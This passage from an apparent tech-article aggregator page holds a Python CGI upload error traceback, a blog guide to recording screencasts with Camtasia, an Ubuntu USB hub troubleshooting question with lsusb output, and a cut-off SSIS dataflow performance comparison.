color="#c040c0">\xcd\xdc\x1a\xfe\xf1\x05\x1b\x15\xd1</font>R<font color="#c040c0">\xce\xe9</font>*<font color="#c040c0">\xb5\x8e</font>b<font color="#c040c0">\x97\x82\x87</font>R<font color="#c040c0">\xf4\xaa</font>K<font color="#c040c0">\x83</font>6<font color="#c040c0">\xbf\xfb</font>0<font color="#c040c0">\xa0\xb6</font>8<font color="#c040c0">\xa9</font>C<font color="#c040c0">\x86\x8d\x96</font>n+E<font color="#c040c0">\xd3\x7f\x99\xff\xd9</font>', <em>global</em> <strong>builtins</strong>&nbsp;= &lt;module '__builtin__' (built-in)&gt;, builtins.<strong>open</strong>&nbsp;= &lt;built-in function open&gt;</font></small></td></tr></table><p><strong>&lt;type 'exceptions.TypeError'&gt;</strong>: file() argument 1 must be encoded string without NULL bytes, not str <br><tt><small>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</small>&nbsp;</tt>args&nbsp;= ('file() argument 1 must be encoded string without NULL bytes, not str',) <br><tt><small>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</small>&nbsp;</tt>message&nbsp;= 'file() argument 1 must be encoded string without NULL bytes, not str' <!-- The above is a description of an error in a Python program, formatted for a Web browser because the 'cgitb' module was enabled. In case you are not reading this in a Web browser, here is the original traceback: Traceback (most recent call last): File "/var/www/html/Main/cgi-bin/resize.py", line 12, in &lt;module&gt; im = Image.open("../JS/upload/" + filename) File "/usr/lib/python2.7/dist-packages/PIL/Image.py", line 1996, in open fp = builtins.open(fp, "rb") TypeError: file() argument 1 must be encoded string without NULL bytes, not str --> Does this mean that the formData I am sending over is empty?

    Read the article

  • How I Record Screencasts

    - by Daniel Moth
    I get this asked a lot so here is my brain dump on the topic. What A screencast is just a demo that you present to yourself while recording the screen. As such, my advice for clearing your screen for demo purposes and setting up Visual Studio still applies here (adjusting for the fact I wrote those blog posts when I was running Vista and VS2008, not Windows 8 and VS2012). To see examples of screencasts, watch any of my screencasts on channel9. Why If you are a technical presenter, think of when you get best reactions from a developer audience in your sessions: when you are doing demos, of course. Imagine if you could package those alone and share them with folks to watch over and over? If you have ever gone through a tutorial trying to recreate steps to explore a feature, think how much more helpful it would be if you could watch a video and follow along. Think of how many folks you "touch" with a conference presentation, and how many more you can reach with an online shorter recording of the demo. If you invest so much of your time for the first type of activity, isn't the second type of activity also worth an investment? Fact: If you are able to record a screencast of a demo, you will be much better prepared to deliver it in person. In fact lately I will force myself to make a screencast of any demo I need to present live at an upcoming event. It is also a great backup - if for whatever reason something fails (software, network, etc) during an attempt of a live demo, you can just play the recorded video for the live audience. There are other reasons (e.g. internal sharing of the latest implemented feature) but the context above is the one within which I create most of my screencasts. Software & Hardware I use Camtasia from Tech Smith, version 7.1.1. Microsoft has a variety of options for capturing the screen to video, but I have been using this software for so long now that I have not invested time to explore alternatives… I also use whatever cheapo headset is near me, but sometimes I get some complaints from some folks about the audio so now I try to remember to use "the good headset". I do not use a web camera as I am not a huge fan of PIP. Preparation First you have to know your technology and demo. Once you think you know it, write down the outline and major steps of the demo. Keep it short 5-20 minutes max. I break that rule sometimes but try not to. The longer the video is the more chances that people will not have the patience to sit through it and the larger the download wmv file ends up being. Run your demo a few times, timing yourself each time to ensure that you have the planned timing correct, but also to make sure that you are comfortable with what you are going to demo. Unlike with a live audience, there is no live reaction/feedback to steer you, so it can be a bit unnerving at first. It can also lead you to babble too much, so try extra hard to be succinct when demoing/screencasting on your own. TIP: Before recording, hide your desktop/taskbar clock if it is showing. Recording To record you start the Camtasia Recorder tool Configure the settings thought the menus Capture menu to choose custom size or full screen. I try to use full screen and remember to lower the resolution of your screen to as low as possible, e.g. 1024x768 or 1360x768 or something like that. From the Tools -> Options dialog you can choose to record audio and the volume level. Effects menu I typically leave untouched but you should explore and experiment to your liking, e.g. how the mouse pointer is captured, and whether there should be a delay for the recording when you start it. Once you've configured these settings, typically you just launch this tool and hit the F9 key to start recording. TIP: As you record, if you ever start to "lose your way" hit F9 again to pause recording, regroup your thoughts and flow, and then hit F9 again to resume. Finally, hit F10 to stop recording. At that point the video starts playing for you in the recorder. This is where you can preview the video to see that you are happy with it before saving. If you are happy, hit the Save As menu to choose where you want to save the video.     TIP: If you've really lost your way to the extent where you'll need to do some editing, hit F10 to stop recording, save the video and then record some more - you'll be able to stitch the videos together later and this will make it easier for you to delete the parts where you messed up. TIP: Before you commit to recording the whole demo, every time you should record 5 seconds and preview them to ensure that you are capturing the screen the way you want to and that your audio is still correctly configured and at the right level. Trust me, you do not want to be recording 15 minutes only to find out that you messed up on the configuration somewhere. Editing To edit the video you launch another Camtasia app, the Camtasia Studio. File->New Project. File->Save Project and choose location. File->Import Media and choose the video(s) you saved earlier. These adds them to the area at the top/middle but not at the timeline at the bottom. Right click on the video and choose Add to timeline. It will prompt you for the Editing dimensions and I always choose Recording Dimensions. Do whatever edits you want to do for this video, then add the next video if you have one to stitch and repeat. In terms of edits there are many options. The simplest is to do nothing, which is the option I did when I first starting doing these in 2006. Nowadays, I typically cut out pieces that I don't like and also lower/mute the audio in other areas and also speed up the video in some areas. A full tutorial on how to do this is beyond the scope of this blog post, but your starting point is to select portions on the timeline and then open the Edit menu at the very top (tip: the context menu doesn't have all options). You can spend hours editing a recording, so don’t lose track of time! When you are done editing, save again, and you are now ready to Produce. Producing Production is specific to where you will publish. I've only ever published on channel9, so for that I do the following File -> Produce and share. This opens a wizard dialog In the dropdown choose Custom production settings Hit Next and then choose WMV Hit Next and keep the default of Camtasia Studio Best Quality and File Size (recommended) Hit Next and choose Editing dimensions video size Hit Next, hit Options and you get a dialog. Enter a Title for the project tab and then on the author tab enter the Creator and Homepage. Hit OK Hit Next. Hit Next again. Enter a video file name in the Production name textbox and then hit Finish. Now do other stuff while you wait for the video to be produced and you hear it playing. After the video is produced watch it to ensure it was produced correctly (e.g. sometimes you get mouse issues) and then you are ready for publishing it. Publishing Follow the instructions of the place where you are going to publish. If you are MSFT internal and want to choose channel9 then contact those folks so they can share their instructions (if you don't know who they are ping me and I'll connect you but they are easy to find in the GAL). For me this involves using a tool to point to the video, choosing a file name (again), choosing an image from the video to display when it is not playing, choosing what output formats I want, and then later on a webpage adding tags, adding a description, and adding a title. That’s all folks, have fun! Comments about this post by Daniel Moth welcome at the original blog.

    Read the article

  • USB Hub and Ubuntu

    - by aserwin
    I have a powered 7 port hub connected to my Ubuntu box and it does nothing. The devices (zip drive and web cam) work direct, but aren't recognized through the hub. This worked fine in Windows 7. I can't prove it is the OS because this is a new motherboard and processor. Any advice? EDIT : Output from lsusb -v Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed (or root) hub bMaxPacketSize0 64 idVendor 0x1d6b Linux Foundation idProduct 0x0002 2.0 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic ehci_hcd iProduct 2 EHCI Host Controller iSerial 1 0000:00:12.2 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0004 1x 4 bytes bInterval 12 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 5 wHubCharacteristic 0x000a No power switching (usb 1.0) Per-port overcurrent protection bPwrOn2PwrGood 10 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0xff Hub Port Status: Port 1: 0000.0100 power Port 2: 0000.0503 highspeed power enable connect Port 3: 0000.0100 power Port 4: 0000.0100 power Port 5: 0000.0100 power Device Status: 0x0001 Self Powered Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed (or root) hub bMaxPacketSize0 64 idVendor 0x1d6b Linux Foundation idProduct 0x0002 2.0 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic ehci_hcd iProduct 2 EHCI Host Controller iSerial 1 0000:00:13.2 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0004 1x 4 bytes bInterval 12 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 5 wHubCharacteristic 0x000a No power switching (usb 1.0) Per-port overcurrent protection bPwrOn2PwrGood 10 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0xff Hub Port Status: Port 1: 0000.0100 power Port 2: 0000.0100 power Port 3: 0000.0100 power Port 4: 0000.0100 power Port 5: 0000.0100 power Device Status: 0x0001 Self Powered Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed (or root) hub bMaxPacketSize0 64 idVendor 0x1d6b Linux Foundation idProduct 0x0002 2.0 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic ehci_hcd iProduct 2 EHCI Host Controller iSerial 1 0000:00:16.2 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0004 1x 4 bytes bInterval 12 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 4 wHubCharacteristic 0x000a No power switching (usb 1.0) Per-port overcurrent protection bPwrOn2PwrGood 10 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0xff Hub Port Status: Port 1: 0000.0100 power Port 2: 0000.0100 power Port 3: 0000.0100 power Port 4: 0000.0100 power Device Status: 0x0001 Self Powered Bus 004 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed (or root) hub bMaxPacketSize0 64 idVendor 0x1d6b Linux Foundation idProduct 0x0001 1.1 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic ohci_hcd iProduct 2 OHCI Host Controller iSerial 1 0000:00:12.0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0002 1x 2 bytes bInterval 255 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 5 wHubCharacteristic 0x0002 No power switching (usb 1.0) Ganged overcurrent protection bPwrOn2PwrGood 2 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0xff Hub Port Status: Port 1: 0000.0100 power Port 2: 0000.0100 power Port 3: 0000.0100 power Port 4: 0000.0100 power Port 5: 0000.0100 power Device Status: 0x0001 Self Powered Bus 005 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed (or root) hub bMaxPacketSize0 64 idVendor 0x1d6b Linux Foundation idProduct 0x0001 1.1 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic ohci_hcd iProduct 2 OHCI Host Controller iSerial 1 0000:00:13.0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0002 1x 2 bytes bInterval 255 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 5 wHubCharacteristic 0x0002 No power switching (usb 1.0) Ganged overcurrent protection bPwrOn2PwrGood 2 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0xff Hub Port Status: Port 1: 0000.0100 power Port 2: 0000.0100 power Port 3: 0000.0100 power Port 4: 0000.0100 power Port 5: 0000.0100 power Device Status: 0x0001 Self Powered Bus 006 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed (or root) hub bMaxPacketSize0 64 idVendor 0x1d6b Linux Foundation idProduct 0x0001 1.1 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic ohci_hcd iProduct 2 OHCI Host Controller iSerial 1 0000:00:14.5 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0002 1x 2 bytes bInterval 255 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 2 wHubCharacteristic 0x0002 No power switching (usb 1.0) Ganged overcurrent protection bPwrOn2PwrGood 2 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0xff Hub Port Status: Port 1: 0000.0100 power Port 2: 0000.0100 power Device Status: 0x0001 Self Powered Bus 007 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 0 Full speed (or root) hub bMaxPacketSize0 64 idVendor 0x1d6b Linux Foundation idProduct 0x0001 1.1 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic ohci_hcd iProduct 2 OHCI Host Controller iSerial 1 0000:00:16.0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0002 1x 2 bytes bInterval 255 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 4 wHubCharacteristic 0x0002 No power switching (usb 1.0) Ganged overcurrent protection bPwrOn2PwrGood 2 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0xff Hub Port Status: Port 1: 0000.0303 lowspeed power enable connect Port 2: 0000.0100 power Port 3: 0000.0100 power Port 4: 0000.0100 power Device Status: 0x0001 Self Powered Bus 008 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 1 Single TT bMaxPacketSize0 64 idVendor 0x1d6b Linux Foundation idProduct 0x0002 2.0 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic xhci_hcd iProduct 2 xHCI Host Controller iSerial 1 0000:02:00.0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 25 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0004 1x 4 bytes bInterval 12 Hub Descriptor: bLength 9 bDescriptorType 41 nNbrPorts 2 wHubCharacteristic 0x0009 Per-port power switching Per-port overcurrent protection TT think time 8 FS bits bPwrOn2PwrGood 10 * 2 milli seconds bHubContrCurrent 0 milli Ampere DeviceRemovable 0x00 PortPwrCtrlMask 0xff Hub Port Status: Port 1: 0000.0100 power Port 2: 0000.0100 power Device Status: 0x0001 Self Powered Bus 009 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 3.00 bDeviceClass 9 Hub bDeviceSubClass 0 Unused bDeviceProtocol 3 bMaxPacketSize0 9 idVendor 0x1d6b Linux Foundation idProduct 0x0003 3.0 root hub bcdDevice 3.02 iManufacturer 3 Linux 3.2.0-32-generic xhci_hcd iProduct 2 xHCI Host Controller iSerial 1 0000:02:00.0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 31 bNumInterfaces 1 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xe0 Self Powered Remote Wakeup MaxPower 0mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 9 Hub bInterfaceSubClass 0 Unused bInterfaceProtocol 0 Full speed (or root) hub iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0004 1x 4 bytes bInterval 12 bMaxBurst 0 Hub Descriptor: bLength 12 bDescriptorType 42 nNbrPorts 2 wHubCharacteristic 0x0009 Per-port power switching Per-port overcurrent protection bPwrOn2PwrGood 10 * 2 milli seconds bHubContrCurrent 0 milli Ampere bHubDecLat 0.0 micro seconds wHubDelay 0 nano seconds DeviceRemovable 0x00 Hub Port Status: Port 1: 0000.02a0 5Gbps power Rx.Detect Port 2: 0000.02a0 5Gbps power Rx.Detect Binary Object Store Descriptor: bLength 5 bDescriptorType 15 wTotalLength 15 bNumDeviceCaps 1 SuperSpeed USB Device Capability: bLength 10 bDescriptorType 16 bDevCapabilityType 3 bmAttributes 0x00 Latency Tolerance Messages (LTM) Supported wSpeedsSupported 0x0008 Device can operate at SuperSpeed (5Gbps) bFunctionalitySupport 3 Lowest fully-functional device speed is SuperSpeed (5Gbps) bU1DevExitLat 3 micro seconds bU2DevExitLat 2047 micro seconds Device Status: 0x0001 Self Powered Bus 001 Device 002: ID 04a9:1709 Canon, Inc. PIXMA MP150 Scanner Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 idVendor 0x04a9 Canon, Inc. idProduct 0x1709 PIXMA MP150 Scanner bcdDevice 1.08 iManufacturer 1 Canon iProduct 2 MP150 iSerial 3 20BC24 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 62 bNumInterfaces 2 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xc0 Self Powered MaxPower 2mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 3 bInterfaceClass 255 Vendor Specific Class bInterfaceSubClass 0 bInterfaceProtocol 255 iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x07 EP 7 OUT bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x88 EP 8 IN bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x89 EP 9 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0040 1x 64 bytes bInterval 11 Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 1 bAlternateSetting 0 bNumEndpoints 2 bInterfaceClass 7 Printer bInterfaceSubClass 1 Printer bInterfaceProtocol 2 Bidirectional iInterface 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x01 EP 1 OUT bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x82 EP 2 IN bmAttributes 2 Transfer Type Bulk Synch Type None Usage Type Data wMaxPacketSize 0x0200 1x 512 bytes bInterval 0 Device Qualifier (for other device speed): bLength 10 bDescriptorType 6 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 bNumConfigurations 1 Device Status: 0x0001 Self Powered Bus 007 Device 002: ID 046d:c517 Logitech, Inc. LX710 Cordless Desktop Laser Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 1.10 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 8 idVendor 0x046d Logitech, Inc. idProduct 0xc517 LX710 Cordless Desktop Laser bcdDevice 38.10 iManufacturer 1 Logitech iProduct 2 USB Receiver iSerial 0 bNumConfigurations 1 Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 59 bNumInterfaces 2 bConfigurationValue 1 iConfiguration 0 bmAttributes 0xa0 (Bus Powered) Remote Wakeup MaxPower 98mA Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 3 Human Interface Device bInterfaceSubClass 1 Boot Interface Subclass bInterfaceProtocol 1 Keyboard iInterface 0 HID Device Descriptor: bLength 9 bDescriptorType 33 bcdHID 1.10 bCountryCode 0 Not supported bNumDescriptors 1 bDescriptorType 34 Report wDescriptorLength 59 Report Descriptors: ** UNAVAILABLE ** Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x81 EP 1 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0008 1x 8 bytes bInterval 10 Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 1 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 3 Human Interface Device bInterfaceSubClass 1 Boot Interface Subclass bInterfaceProtocol 2 Mouse iInterface 0 HID Device Descriptor: bLength 9 bDescriptorType 33 bcdHID 1.10 bCountryCode 0 Not supported bNumDescriptors 1 bDescriptorType 34 Report wDescriptorLength 177 Report Descriptors: ** UNAVAILABLE ** Endpoint Descriptor: bLength 7 bDescriptorType 5 bEndpointAddress 0x82 EP 2 IN bmAttributes 3 Transfer Type Interrupt Synch Type None Usage Type Data wMaxPacketSize 0x0008 1x 8 bytes bInterval 10 Device Status: 0x0000 (Bus Powered) This is with the powered hub plugged in.

    Read the article

  • Investigation: Can different combinations of components effect Dataflow performance?

    - by jamiet
    Introduction The Dataflow task is one of the core components (if not the core component) of SQL Server Integration Services (SSIS) and often the most misunderstood. This is not surprising, its an incredibly complicated beast and we’re abstracted away from that complexity via some boxes that go yellow red or green and that have some lines drawn between them. Example dataflow In this blog post I intend to look under that facade and get into some of the nuts and bolts of the Dataflow Task by investigating how the decisions we make when building our packages can affect performance. I will do this by comparing the performance of three dataflows that all have the same input, all produce the same output, but which all operate slightly differently by way of having different transformation components. I also want to use this blog post to challenge a common held opinion that I see perpetuated over and over again on the SSIS forum. That is, that people assume adding components to a dataflow will be detrimental to overall performance. Its not surprising that people think this –it is intuitive to think that more components means more work- however this is not a view that I share. I have always been of the opinion that there are many factors affecting dataflow duration and the number of components is actually one of the less important ones; having said that I have never proven that assertion and that is one reason for this investigation. I have actually seen evidence that some people think dataflow duration is simply a function of number of rows and number of components. I’ll happily call that one out as a myth even without any investigation!  The Setup I have a 2GB datafile which is a list of 4731904 (~4.7million) customer records with various attributes against them and it contains 2 columns that I am going to use for categorisation: [YearlyIncome] [BirthDate] The data file is a SSIS raw format file which I chose to use because it is the quickest way of getting data into a dataflow and given that I am testing the transformations, not the source or destination adapters, I want to minimise external influences as much as possible. In the test I will split the customers according to month of birth (12 of those) and whether or not their yearly income is above or below 50000 (2 of those); in other words I will be splitting them into 24 discrete categories and in order to do it I shall be using different combinations of SSIS’ Conditional Split and Derived Column transformation components. The 24 datapaths that occur will each input to a rowcount component, again because this is the least resource intensive means of terminating a datapath. The test is being carried out on a Dell XPS Studio laptop with a quad core (8 logical Procs) Intel Core i7 at 1.73GHz and Samsung SSD hard drive. Its running SQL Server 2008 R2 on Windows 7. The Variables Here are the three combinations of components that I am going to test:     One Conditional Split - A single Conditional Split component CSPL Split by Month of Birth and income category that will use expressions on [YearlyIncome] & [BirthDate] to send each row to one of 24 outputs. This next screenshot displays the expression logic in use: Derived Column & Conditional Split - A Derived Column component DER Income Category that adds a new column [IncomeCategory] which will contain one of two possible text values {“LessThan50000”,”GreaterThan50000”} and uses [YearlyIncome] to determine which value each row should get. A Conditional Split component CSPL Split by Month of Birth and Income Category then uses that new column in conjunction with [BirthDate] to determine which of the same 24 outputs to send each row to. Put more simply, I am separating the Conditional Split of #1 into a Derived Column and a Conditional Split. The next screenshots display the expression logic in use: DER Income Category         CSPL Split by Month of Birth and Income Category       Three Conditional Splits - A Conditional Split component that produces two outputs based on [YearlyIncome], one for each Income Category. Each of those outputs will go to a further Conditional Split that splits the input into 12 outputs, one for each month of birth (identical logic in each). In this case then I am separating the single Conditional Split of #1 into three Conditional Split components. The next screenshots display the expression logic in use: CSPL Split by Income Category         CSPL Split by Month of Birth 1& 2       Each of these combinations will provide an input to one of the 24 rowcount components, just the same as before. For illustration here is a screenshot of the dataflow containing three Conditional Split components: As you can these dataflows have a fair bit of work to do and remember that they’re doing that work for 4.7million rows. I will execute each dataflow 10 times and use the average for comparison. I foresee three possible outcomes: The dataflow containing just one Conditional Split (i.e. #1) will be quicker There is no significant difference between any of them One of the two dataflows containing multiple transformation components will be quicker Regardless of which of those outcomes come to pass we will have learnt something and that makes this an interesting test to carry out. Note that I will be executing the dataflows using dtexec.exe rather than hitting F5 within BIDS. The Results and Analysis The table below shows all of the executions, 10 for each dataflow. It also shows the average for each along with a standard deviation. All durations are in seconds. I’m pasting a screenshot because I frankly can’t be bothered with the faffing about needed to make a presentable HTML table. It is plain to see from the average that the dataflow containing three conditional splits is significantly faster, the other two taking 43% and 52% longer respectively. This seems strange though, right? Why does the dataflow containing the most components outperform the other two by such a big margin? The answer is actually quite logical when you put some thought into it and I’ll explain that below. Before progressing, a side note. The standard deviation for the “Three Conditional Splits” dataflow is orders of magnitude smaller – indicating that performance for this dataflow can be predicted with much greater confidence too. The Explanation I refer you to the screenshot above 